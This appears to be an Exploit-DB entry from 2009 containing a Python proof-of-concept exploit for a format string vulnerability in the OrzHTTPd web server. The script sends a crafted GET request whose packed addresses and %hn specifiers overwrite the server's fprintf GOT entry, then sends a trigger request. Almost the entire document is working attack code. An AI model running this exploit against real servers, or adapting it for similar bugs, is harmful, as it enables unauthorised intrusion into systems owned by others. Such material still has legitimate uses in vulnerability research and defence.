OrzHTTPd Format String Exploit
# Title: OrzHTTPd Format String Exploit
# EDB-ID: 10282
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Patroklos Argyroudis
# Published: 2009-12-03
# Verified: no
# Download Exploit Code
# Download N/A
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 | view sourceprint?#!/usr/bin/env python # orzex.py -- Patroklos Argyroudis, argp at domain census-labs.com # http://code.google.com/p/orzhttpd/source/detail?r=141 import os import sys import socket import struct import time import urllib GET = "GET " def main(argv): argc = len(argv) if argc != 4: print "usage: %s <host> <port> <address>" % (argv[0]) print "[*] find address with objdump -R orzhttpd | grep fprintf" sys.exit(0) host = argv[1] port = int(argv[2]) addr = int(argv[3], 16) print "[*] target: %s:%d:%s" % (host, port, argv[3]) try: sd = urllib.urlopen("http://%s:%d" % (host, port)) sd.close() except IOError, errmsg: print "[*] error: %s" % (errmsg) sys.exit(1) time.sleep(1) fmtstr = struct.pack('<LL', addr + 2, addr) fmtstr += "%.16650x%19$hn%.514x%20$hn" payload = GET payload += fmtstr print "[*] sending exploit format string to %s:%d" % (host, port) sd = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sd.connect((host, port)) sd.send(payload) sd.close() print "[*] sending trigger to %s:%d" % (host, port) sd = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sd.connect((host, port)) sd.send(GET) sd.close() if __name__ == "__main__": main(sys.argv) sys.exit(0) # EOF |